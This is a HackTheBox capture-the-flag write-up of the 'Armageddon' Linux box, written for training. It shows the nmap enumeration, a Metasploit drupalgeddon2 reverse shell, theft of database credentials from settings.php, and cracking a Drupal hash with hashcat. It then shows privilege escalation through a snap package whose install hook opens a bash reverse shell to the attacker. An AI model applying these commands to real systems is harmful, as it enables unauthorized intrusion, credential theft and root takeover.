HackTheBox Writeup: Armageddon
This was an easy-difficulty Linux box that involved exploiting a well known vulnerability in Drupal 7 CMS and escalating privileges by exploiting snap install with sudo privileges.
Enumeration
I started enumerating the target machine by performing a quick scan with NMAP to identify any open ports:
nmap -T5 --open -sS -vvv --min-rate=300 --max-retries=3 -p- -oN all-ports-nmap-report 10.10.10.233PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
The scan identified two ports open (i.e. port 22 and 80). I next used NMAP to identify the services running on each port and used the common NSE scripts to find any common vulnerabilities that I could exploit:
nmap -sV -sC -Pn -v -p 22,80 -oN nmap-report 10.10.10.233PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon
I can see that there is a website hosted on port 80 and that Drupal 7 is being used. There are also a number of entries disallowed in the robots.txt file.
HTTP — Port 80 Analysis
Visiting the website hosted on port 80, I am presented a page with a login:
I looked through the robots.txt file first and found the latest version of Drupal being used in the CHANGELOG.txt file:
Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.A quick search online reveals an exploit called drupalgeddon2. The name of the machine (i.e. Armageddon) hints towards using the drupalgeddon2 exploit. I can use the Metasploit framework to run this exploit and get a meterpreter shell:
msf5 > search drupalmsf5 > use exploit/unix/webapp/drupal_drupalgeddon2msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 10.10.10.233
rhosts => 10.10.10.233
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit[*] Started reverse TCP handler on 10.10.15.15:4444
[*] Sending stage (38288 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.15.15:4444 -> 10.10.10.233:56162) at 2021-06-09 17:12:18 -0400meterpreter >
I started looking for a way to escalate my privileges in order to get the user flag. In Drupal, the file that contains database login credentials is sites/default/settings.php. I found the following credentials:
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);I switched to a shell from meterpreter using the shell command and logged in to the mysql database using the credentials found above. I then started working through the drupal database tables and examined the users table:
mysql -u drupaluser -p
Enter password: CQHEy@9M*m23gBVjuse drupal;
select * from users;# Filtered Outputbrucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
Looking through the table, I found a user called brucetherealadmin and a hashed password for the user. I used hascat to crack the Drupal hash in the database and recover the password for the user:
# -m 7900 : Drupal 7hashcat64.exe -m 7900 -a 0 hash.txt rockyou.txt -o cracked.txt# Output
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
Using these credentials, I can SSH into the target machine and get the user flag:
$ ssh brucetherealadmin@10.10.10.233
[brucetherealadmin@armageddon ~]$ cat user.txt
806b7a775ae8a........Privilege Escalation
Checking the sudo privileges for the current user I am logged in as, I can see that the user brucetherealadmin can run the binary /usr/bin/snap install * with root privileges:
$ sudo -lUser brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
I can exploit this to escalate my privileges to root by creating a snap package that will generate a reverse shell using fpm as seen below:
# Setup the install hook
mkdir -p ./meta/hooks# The script we want to execute as root
printf '#!/bin/bash\nbash -c "bash -i >& /dev/tcp/<IP>/4444 0>&1"\n' > ./meta/hooks/install# Build the snap package
chmod a+x ./meta/hooks/install
fpm -n revshell -s dir -t snap -a all ./meta
I setup a listener on my attacking machine. I then copied the reverse shell snap package onto the target machine and installed the snap package with root privileges using the binary /usr/bin/snap install *.
# This requires the --dangerous flag because the snap is not signed by the Snap Store.
# The --devmode flag acknowledges that you are installing an unconfined application.sudo snap install revshell_1.0_all.snap --dangerous --devmode
I receive a shell with root privileges on my listener and can now get the root flag:
bash-4.3# cat root/root.txt
9b50a94800077........Final Thoughts
I enjoyed working through this machine and learning how to exploit the binary /usr/bin/snap install * to escalate my privileges. This was another easy box that provided a good opportunity for beginners to refine their testing methodology and learn some new skills around exploiting vulnerable content management software and privilege escalation techniques.
